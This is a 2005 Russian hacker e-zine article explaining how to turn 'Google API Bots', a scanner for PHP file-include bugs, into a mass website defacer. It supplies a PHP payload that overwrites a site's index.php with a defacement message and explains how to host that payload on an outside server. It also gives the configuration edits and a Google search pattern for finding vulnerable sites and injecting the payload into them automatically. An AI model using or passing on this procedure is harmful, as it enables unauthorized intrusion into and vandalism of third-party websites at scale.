![]() |
||
Все уже наверное знакомы с творением usun'a "Google API Bots". Они были созданы для поиска include bug, так вот, при желании usun bots могут выступать в роли масс дефейсеров тоже. Для этого нам понадобится notepad и hands. Приступим... Берём наш божественный текстовый редактор и пишем: <? " ;$cmd = 'cp index.php _index.php;echo We hack this shit!>index.php'; PassThru($cmd) ; echo ""; echo "php shell by 31337 supermegammgewhowehaksor" ?> Сохраняем, в нашем случае под именем php.txt. "We hack this shit!"Если вы не поставили ботов, то бегом их качать: http://test.at.tut.by/MessengerGoogleBots_v.1.3.zip и ставить, в Installation.txt и других всё написано, правда не на русском, но нечего Promt в руки и вперёд =) Надеюсь поставили, api key зарегали на http://api.google.com/. Теперь нужно их переделать не просто в ботов, а в масс дефейсеров. Это совсем легко. Просто открываем: patch_to_bots\WEB-INF\config\tasks\googlebots\includes\ filenameinparameter\include\CheckCustomResponseSettings.properties.Находим: >>#Flag that indicates whether it's necessary to save 'good' HTTP responses. >>result.save.flag=falseменяем на: >>#Flag that indicates whether it's necessary to save 'good' HTTP responses. >>result.save.flag=trueможно и не менять, но тогда вам прийдётся все сайты на которых побывал бот, то есть good.dat, самим просматривать, а так миррор у вас сразу на винте. Потом... находим: >>#Replace string for URL pattern to check custom content availability. >>url.replace=*************и пишем путь к нащему php.txt, перед этим естественно нужно зарегать себе сайт и залить туда этот заветный файлик, так что бегом на narod.ru. В нашем случае http://bottest.amillo.net/php.txt. Всё у нас есть, нужно теперь поставить точки над "И". Ищем всё в том же файле: >>#Regular expression to check whether HTTP response contains some custom content. >>result.regular.expression=*****меняем на: >>#Regular expression to check whether HTTP response contains some custom content. >>result.regular.expression=supermegammgewhowehaksor.Остальное можно не трогать. Это самое "supermegammgewhowehaksor" взялось не случайно, мы его прописывале в нашем php.txt, по этой строке оно будет сверять уязвим ли сайт. Фууух, переделали, ну наконец.... Запускаем и вводим inurl:"*index*?file=*.htm" или что-то подобное и смотрим... Через время боты заканчиваю работать, а мы наслаждаемся результатом. Вот и всё. |
||
![]() ![]() ![]() ![]() |
||
Автор:
DRE /28.01.05/ © Mazafaka.Ru - E-Zine - 2005 © |